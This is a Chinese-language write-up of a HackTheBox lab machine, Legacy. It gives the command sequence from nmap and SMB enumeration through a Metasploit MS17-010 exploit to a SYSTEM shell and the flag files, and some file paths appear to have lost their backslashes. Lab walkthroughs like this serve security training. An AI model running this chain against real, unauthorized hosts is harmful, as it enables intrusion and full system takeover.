靶机信息
靶机地址:
https://app.hackthebox.com/machines/Legacy
靶场: HackTheBox.com
靶机名称:Legacy
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Manjaro 10.10.16.3
靶机:10.10.10.4
信息收集
扫描端口
扫描靶机开放的服务端口
sudo masscan -p1-65535 --interface tun0 10.10.10.4
sudo nmap -sC -sV -p 139,445 10.10.10.4 -oN nmap.log
从扫描结果中看到是一台windows xp操作系统的主机,先来看看smb服务
SMB服务渗透
smbmap -H 10.10.10.4
smbclient -N -L 10.10.10.4
rpcclient 10.10.10.4 -U ""
使用多款工具检测无任何结果,使用nmap自带的脚本扫描
先来看看nmap自带的有哪些smb的poc脚本
find /usr/share/nmap/scripts |grep smb |grep vuln
poc有很多,开始检测
nmap --script smb-vuln* 10.10.10.4 -p 445 -oN nmap-smb-vuln.log
扫描结果中可以看到445端口存在MS17-010漏洞,可以使用msf攻击
msfconsole
搜索ms17-010的exp并按序号选择第1个
search ms17-010
use 1
查看需要修改的选项,并修改目标IP和本地IP
show options
set RHOSTS 10.10.10.4
set LHOST 10.10.16.3
设置完成开始攻击
exploit
攻击成功,直接拿到SYSTEM权限,来找找flag
shell
cd c:"Documents and Settings"
type johndesktopuser.txt
type administratordesktoproot.txt
拿到2个flag,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论